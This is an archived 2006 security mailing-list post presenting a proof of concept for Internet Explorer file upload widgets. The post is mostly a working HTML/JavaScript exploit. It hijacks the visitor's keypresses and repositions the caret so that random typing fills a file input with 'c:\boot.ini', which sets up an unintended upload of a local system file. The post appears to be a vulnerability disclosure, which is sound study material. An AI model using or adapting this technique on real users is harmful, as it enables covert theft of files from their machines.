| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <44885061.5020106@gmx.net>
Date: Thu Jun 8 17:27:06 2006
From: obliv at gmx.net (Bart van Arnhem)
Subject: file upload widgets in IE and Firefox have
issues
Here is another proof of concept for IE only, it allows the characters
to be entered in a arbitrary order, since it repositions the caret to
make the characters drop in the right place.
Just open this HTML in IE and bash on the keyboard a bit.
- Bart
<html>
<head>
<script type="text/javascript">
var targetFile = "c:\\boot.ini";
window.onload = function ()
{
tempFilled = new Array(targetFile.length + 1).join("\x01");
tempDone = targetFile.toUpperCase();
document.getElementById("target").onkeyup = function ()
{ this.blur(); };
document.getElementById("target").onkeypress = function (e)
{
if (!e) e = window.event;
var pressed =
String.fromCharCode(e.keyCode).toUpperCase();
if ((origPos = tempDone.indexOf(pressed)) !== -1)
{
tempFilled = tempFilled.substr(0, origPos) +
pressed + tempFilled.substr(origPos + 1);
tempDone = tempDone.replace(pressed, "\x01");
var matches = tempFilled.substr(0,
origPos).match(/\x01/g);
tempPos = origPos - (matches == null ? 0 :
matches.length);
var range =
document.getElementById("target").createTextRange();
range.collapse(true);
range.move("character", tempPos);
range.select();
return true;
}
return false;
}
document.onkeydown = function () {
document.getElementById("target").focus() };
}
</script>
</head>
<body>
<form method="post" action="">
<input type="file" id="target" />
</form>
</body>
</html>
Powered by blists - more mailing lists